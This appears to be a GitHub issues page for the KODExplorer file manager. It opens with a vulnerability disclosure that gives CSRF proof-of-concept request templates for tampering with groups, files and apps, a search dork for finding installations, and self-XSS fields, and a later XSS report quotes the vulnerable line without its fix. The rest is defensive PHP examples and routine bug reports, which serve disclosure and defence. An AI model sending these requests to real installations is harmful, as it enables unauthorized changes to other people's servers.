kalcaddle / kodexplorer
A web based file manager, web IDE / browser based code editor
Home Page: https://kodcloud.com
Exploit Title : KODExplorer Multiple Vulnerabilities
Product Vendor: kalcaddle
Product Link : http://kalcaddle.com/
Google Dorks : intext:"Powered by KodExplorer"
Exploit Author: Ben Khlifa Fahmi
I - CSRF on Group Management :
Description : an attacker can add, remove or edit any User Group by sending an exploit link to a logged in admin.
Vulnerable Controller : group.class.php
Proof of Concept :
Add Group : POST Request
action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extensions (ex: php|jsp|etc..)]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
Edit Group : POST Request
action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extensions (ex: php|jsp|etc..)]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
Delete Group : http://localhost/index.php?group/del&role=[group_name]
II - CSRF on File Management :
Description : an attacker can add a file, upload a file from an external site, or delete or edit a file/path by sending a link to a logged in administrator.
Vulnerable Controller : explorer.class.php
Proof of Concept :
Add a file(1) : http://localhost/index.php?explorer/mkfile&path=[file name]
Delete file : POST Request
action URL: http://localhost/index.php?explorer/pathDelete
post data : list[[{"type":"file","path":"[path to file you want to remove]"}]]
Upload File(2): http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want]
Edit file : POST Request
action URL:POST http://localhost/index.php?editor/fileSave
Post Data :
path[path to file]
charset[utf-8]
filestr[[file content]]
III - CSRF on App Management :
Description : an attacker can add, edit or remove any app by sending a link to a logged in admin.
Vulnerable Controller : app.class.php
Proof of Concept :
Add app : POST request
action url : http://localhost/index.php?app/add&name=a
POST DATA : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[your app name]%2522%252C%2522desc%2522%253A%2522[your app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D]
Delete App : http://localhost/index.php?app/del&name=[your app]
IV - Multiple Self XSS :
Description : KODExplorer suffers from many Self XSS issues. The fields vulnerable to XSS are Username, App Name, App Source, Folder Name, File Name and Group Name. To trigger it, just inject HTML code into one of the vulnerable fields above.
V - Solution :
I have released a fix on my GitHub account; you can clone it or just wait for a patch to be released in the next version, as I have reported all possible vulnerabilities.
Thanks : I want to say "thank you" to:
- Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn
- Arab Oracle Users Group (@araboug) http://www.araboug.org
- @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine.
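A defender's counterpart to the three CSRF sections and the Self XSS section above, added here as an example; it is neither kodexplorer's code nor the fix the reporter published. It assumes a front controller that routes on the first query key (index.php?group/add&role=..., the URL style the PoCs show); the function names, the STATE_CHANGING list (built from the actions named in the PoCs) and the csrf_token field name are assumptions. The two controls are simple: every state-changing action must arrive by POST carrying a per-session token that a foreign page cannot read, and any user-chosen name is HTML-escaped when it is echoed back.

```php
<?php
// Added example, not kodexplorer code: minimal request gate for a file manager.
// (1) State-changing actions need POST + a per-session CSRF token (kills both the
//     plain GET links and the cross-site POST forms in the report).
// (2) Names rendered back into HTML (username, group, app, file) are escaped.
// Function names, the action list and the field name are assumptions.

session_start();

/** Issue one random token per session; templates embed it in every form/XHR. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session token. */
function csrf_token_valid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Actions that change state (taken from the PoCs above). Read-only actions such
// as group/get stay reachable without a token.
const STATE_CHANGING = [
    'group/add', 'group/edit', 'group/del',
    'explorer/mkfile', 'explorer/pathDelete', 'explorer/serverDownload',
    'editor/fileSave', 'app/add', 'app/del',
];

/**
 * Gate one request. Returns null when it may proceed, otherwise a short reason.
 * $server and $post are passed in so the check can be exercised without a web server.
 */
function csrf_gate(string $action, array $server, array $post): ?string
{
    if (!in_array($action, STATE_CHANGING, true)) {
        return null;                                   // read-only: no token needed
    }
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return 'state-changing action must be POST';   // a bare link can no longer act
    }
    // Defence in depth: browsers send Origin on cross-site POSTs; a foreign one is
    // rejected. Port is stripped from Host for the comparison (IPv6 hosts ignored here).
    $host = strtolower(preg_replace('/:\d+$/', '', $server['HTTP_HOST'] ?? ''));
    $origin = $server['HTTP_ORIGIN'] ?? '';
    if ($origin !== '' && strtolower((string) parse_url($origin, PHP_URL_HOST)) !== $host) {
        return 'cross-origin request';
    }
    if (!csrf_token_valid($post['csrf_token'] ?? null)) {
        return 'missing or invalid CSRF token';
    }
    return null;
}

/** Output encoding for any user-supplied name rendered into HTML. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// --- dispatch (assumed routing style: index.php?group/add&role=...) ----------
$action = (string) (key($_GET) ?: '');
$reason = csrf_gate($action, $_SERVER, $_POST);
if ($reason !== null) {
    http_response_code(403);
    exit('Request rejected: ' . e($reason));
}
// ... hand $action to the real controller here ...
// When rendering, e.g. a group row: echo '<td>' . e($group['role']) . '</td>';
```

The token only helps if every form and XHR in the templates actually sends it (as a hidden field or request header); the Origin check is a second layer, not a replacement, because older clients may omit the header.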
Fork this project into your own account.
Register an account on DaoCloud: https://www.daocloud.io/
1. In "Code Build", create a new project, set a name, choose your fork of this project as the code source, then build and wait for it to succeed.
2. After the build succeeds, click "View built image", then click "Deploy latest version" and wait for the deployment to finish.
3. Once deployed, you can access it at the URL provided. (DaoCloud's documentation and support staff are great; ask them anything you don't understand, haha.)
Doesn't cost a cent to set one up. Hahaha
Opening a folder with several hundred files is very slow. How can this be optimized?
When I use Kod on my Raspberry Pi 2 (OS based on Debian), I found that when a file is larger than 2GB, the file size shown is incorrect. I fixed this problem with the following method:
/lib/function/file.function.php
turn :
function get_filesize($path){
@$ret = abs(sprintf("%u",filesize($path)));
return (int)$ret;
}
to this:
function get_filesize($path){
@$ret = abs(sprintf("%u",filesize($path)));
return $ret;
}
But when the file size is over 4G, it is still incorrect.
Then add a function "fsize()" before "get_filesize()":
function fsize($file) {
// On 32-bit PHP, filesize() only returns the lower 32 bits of the file's
// size, as a signed int. Make it unsigned. (On 64-bit PHP the value is
// already correct and the probing below finds no extra blocks.)
$fmod = filesize($file);
if ($fmod < 0) $fmod += 2.0 * (PHP_INT_MAX + 1);
// Find the upper bits by probing: count the 2 GB (PHP_INT_MAX + 1 byte)
// offsets at which a byte can still be read.
$i = 0;
$myfile = fopen($file, "r");
// feof() has undefined behaviour for big files. After we move past the end
// with fseek(), fread() may not detect eof, but it also can't read any bytes,
// so use the number of bytes read as the indicator.
while (strlen(fread($myfile, 1)) === 1) {
fseek($myfile, PHP_INT_MAX, SEEK_CUR);
$i++;
}
fclose($myfile);
// $i is now ceil(size / 2 GB). $fmod already holds the size modulo 4 GB, so
// only whole 4 GB blocks are missing: floor((i - 1) / 2) of them when $fmod > 0,
// and exactly i / 2 when $fmod == 0 (size is an exact multiple of 4 GB).
// Just rounding $i down to an even number would overcount by 4 GB whenever
// $fmod lies between 2 GB and 4 GB (e.g. a 3 GB file would report 7 GB).
$blocks4 = ($fmod > 0) ? max(0, (int)floor(($i - 1) / 2)) : (int)($i / 2);
$four_gb = 2.0 * (PHP_INT_MAX + 1);
return ((float)$blocks4 * $four_gb) + $fmod;
}
and turn get_filesize() to this:
function get_filesize($path){
@$ret = fsize($path);
return $ret;
}
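To see the arithmetic behind this report without creating multi-gigabyte files, here is an added simulation; it is not kodexplorer code and not the reporter's patch. It emulates what a 32-bit filesize() returns for a given true size, then runs the probe-and-recombine idea against an oracle in place of fopen()/fread(). It generalizes the posted fix slightly by probing at 4 GiB multiples, so the high part becomes a single comparison. The constant and function names are made up for the example, the sizes are constructed inputs, and the arrow function needs PHP 7.4+.

```php
<?php
// Added example, not kodexplorer code: offline simulation of the 32-bit
// filesize() wrap-around and of recovering the real size by probing.
// "The file" is represented only by its true size (constructed values below);
// the probe asks an oracle instead of seeking in a real file.

const GIB   = 1073741824.0;        // 2^30 as a float: products stay exact
const TWO32 = 4294967296.0;        // 2^32 as a float

/** What filesize() returns on a 32-bit PHP build: the low 32 bits as a signed int. */
function emulate_filesize32(float $true_size): int
{
    $low = fmod($true_size, TWO32);
    return $low >= TWO32 / 2 ? (int) ($low - TWO32) : (int) $low;
}

/**
 * Count how many of the offsets 0, 4 GiB, 8 GiB, ... hold a readable byte.
 * $readable($offset) stands in for "fseek() there, then fread() one byte".
 */
function count_4gib_probes(callable $readable): int
{
    $j = 0;
    for ($pos = 0.0; $readable($pos); $pos += TWO32) {
        $j++;
    }
    return $j;
}

/** Recombine the low 32 bits with the probe count into the true size. */
function recover_size(int $low32, int $probes): float
{
    $low = (float) $low32;
    if ($low < 0) {
        $low += TWO32;                 // undo the signed reinterpretation
    }
    // A byte exists at offset k*4GiB for every complete 4 GiB block k, plus one
    // extra probe hit when a partial block follows (i.e. when $low > 0).
    $full_blocks = ($low > 0.0) ? $probes - 1 : $probes;
    return $full_blocks * TWO32 + $low;
}

/** Run the whole round trip for one constructed size. */
function simulate(float $true_size): array
{
    $low32     = emulate_filesize32($true_size);
    $probes    = count_4gib_probes(fn(float $off): bool => $off < $true_size);
    $recovered = recover_size($low32, $probes);
    return [
        'true'       => $true_size,
        'filesize32' => $low32,
        'probes'     => $probes,
        'recovered'  => $recovered,
        'ok'         => $recovered === $true_size,
    ];
}

// Constructed sizes: below 2 GiB (fine), 2-4 GiB (negative), 4 GiB exactly
// (reports 0), above 4 GiB (wraps).
foreach ([0.0, 1.0, 1.5 * GIB, 3 * GIB, 4 * GIB, 5 * GIB, 7 * GIB, 8 * GIB] as $size) {
    $r = simulate($size);
    printf("%6.1f GiB  filesize()=%12d  probes=%d  recovered=%6.1f GiB  %s\n",
        $r['true'] / GIB, $r['filesize32'], $r['probes'], $r['recovered'] / GIB,
        $r['ok'] ? 'OK' : 'MISMATCH');
}
```

The 3 GiB and 7 GiB rows are the ones that matter: filesize() reports -1 GiB for both, and only the probe count tells them apart. Every row should print OK; a MISMATCH would mean the recombination rule is wrong for that size class.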
Hi,
In the previous versions of kodexplorer that I used, I made some "not easy" changes to your code to skip the login page, but in this new version this change no longer works.
Maybe you can help me with an easier way: I have a private server and I want my user to access KodExplorer without logging in; I want him to be logged in automatically as admin. How can I do that?
Not deployed on the public internet, only within a local LAN: how can Office file access be implemented?
Deploying with busybox + php-cgi on a PC works fine, but when deployed on my phone (Android), accessing it from the browser gives this problem.
On Windows I can't exclude directories, or perhaps my settings are wrong: how do I keep the file manager from showing directories outside the project (such as C:\windows)? I don't know whether this needs a KODExplorer setting or an Apache server setting; I've never used Apache before. I'd appreciate a detailed method for excluding directories on Windows, thanks!
Thanks
If I choose "more > duplicate" on a folder, it does not do anything.
In the previous version, I had to click "reload tree"; in this version, nothing works.
Because all I see are the files from the demo.
Hello,
What about IP filtering: in the options, set a list of allowed IPs, and only these IPs can access the program.
When will FTP user login be supported, like net2ftp? It's hard to set up on a Linux server.
wrong with pclzip
Line 219 should be like this : if ((!function_exists('gzopen64')) && (!function_exists('gzopen')))
Hello,
In the new version, when opening a latin1 iso-8859-1 encoded file, I get the following error:
Warning: mb_convert_encoding(): Illegal character encoding specified in /var/www/kod/controller/editor.class.php on line 34
When accessing the file manager from a mobile device and tapping a PHP file, the file gets executed by the server. This feels rather dangerous; I don't know whether it's a bug or a feature.
When opening with the administrator account on a phone, opening a file shows not the file's contents but the file's link on the site.
When uploading images I frequently get disconnected and have to log in again. Has anyone else run into this?
3.1 prompts for an automatic update download, but keeps reporting that the download failed. -- I looked in the data directory and there is a 3.12 zip file downloaded there.
Also, the editor cannot do syntax highlighting; the requested JS path is wrong.
For example, my deployment address is http://aaa.com/filemanager/ (a virtual directory)
The actual physical path is d:/www/website/KODExplorer
When using the file sharing feature, the share address comes out like this; I can't just copy it and publish the address, I have to edit it by hand.
http://aaaa.com/D:/www/website/KODExplorer/index.php?share/file&user=admin&sid=SOrPHAtG
Other PHP setups serve it normally; only Mango Cloud (芒果云) doesn't work.
Serving through Apache works, but I'd like to serve it through Nginx, which is also more efficient.
After sharing a folder and fetching the file list, if the folder contains a large number of images they are displayed through the index.php?share/image proxy, which causes a burst of requests in a short time, triggers the concurrency control in check_post_many(), and the system logs out automatically...
Hi sir, when will you release the new version of this awesome plugin? I really need it because the current version has lots of bugs when uploading folders with subfolders (drag'n'drop).
When I open kodexplorer/index.php , it says:
Warning: Unexpected character in input: ' in /Applications/AMPPS/www/kodexplorer/index.php on line 1
Parse error: syntax error, unexpected T_INCLUDE in /Applications/AMPPS/www/kodexplorer/index.php on line 2
I didn't change my index.php and even config/config.php!
HI ,
I am Ben Khlifa Fahmi, a security researcher from the security team "Tunisian Whitehats Security". We have recently identified a security bug in your script.
This bug is a cross-site scripting vulnerability.
Impact : Critical ( 👎 )
Vulnerable template : "template/file.php"
vulnerable line : 55
Vulnerable Code : <script src="./index.php?share/common_js&user=&sid=&#="></script>
Solution ;
change the line 55 with this new line :
As the title says: after deploying on Baidu's BAE or Alibaba's ACE, use the temporary space by default, and switch to managing cloud storage once the user enters the corresponding cloud storage address and key.
Kodexplorer currently covers most of the functions of a file manager, but using cloud storage will be the mainstream in the future.
If I want to extend the program's functionality, how should I go about it? I couldn't find documentation on the official site, but in the program I see a folder like lib/plugins...
I assigned the right permissions to the folder but I'm still getting the error below
error:
kodexplorer/data/system can't write
kodexplorer/data/User can't write
kodexplorer/data/thumb can't write
Please, how can I resolve the error?
Thank you
I found that what is POSTed to the server is
member/edit:
name:project
name_to:project
role_to:default
password_to112233:
The password field is wrong
I'd like a Baidu Cloud app added, so files can be conveniently downloaded to the NAS.
An error occurred
We're sorry, but for some reason we can't open this for you.
Is there a plan to show a rendered preview when opening Markdown files?
Sorry, it was my own modifications to the code that broke it.
Adding one check to the checkExt() function solves the problem.
The zip archive was packed on Windows, and KODExplorer is on a Linux server; the different character sets cause the extraction result to be just an empty archive instead of the normal files.
I uploaded a 10+ MB video; after part of it was uploaded it just reported that the upload failed!!
Hi,
There is a serious bug on your library and I would like to help you reporting it.
Open an empty directory in the file explorer of KodExplorer and leave it open inside the browser. After that, drag a folder with some subdirectories/files inside it from the computer to the browser. The first time I do that, everything works fine.
But if I do that another time, all kinds of unexpected behaviour may happen. Instead of overwriting the files, KodExplorer creates several directories in the wrong places inside the already uploaded folder. It corrupts the whole tree. It's very easy to reproduce.
The expected behaviour should be this: if I overwrite a folder it should overwrite every file/directory inside it. But that's not what happens. If you need more info I will be glad to help you.
NOTE: on previous version overwriting was never good but at this version it makes a mess when overwriting.
After entering the wrong password three times, the captcha doesn't show up. How can this be solved?
When I try to delete a file I get this error:
"Path can't write, check the permission"
I can edit, move, rename but not delete.
If I set 777 on the file or the folder, no change.
When I change settings in the editor (ACE), they are not saved (in fact, there is no button to save).
Version 3.12: in desktop mode, right-clicking an icon and choosing "edit application", the name cannot be deleted and cursor movement isn't supported.
Why is PHP error reporting turned on in config? Or was it forgotten when publishing the release? Some prompts no longer display properly.
@ini_set("display_errors","on");
File upload fails on IE 9
"A perfect replacement for FTP management: usable for server file management, supports image, music and video preview, online compression/decompression, drag-and-drop folder upload..."
Where is this online decompression you mention? I can't find the feature.
To add: it's a tar archive.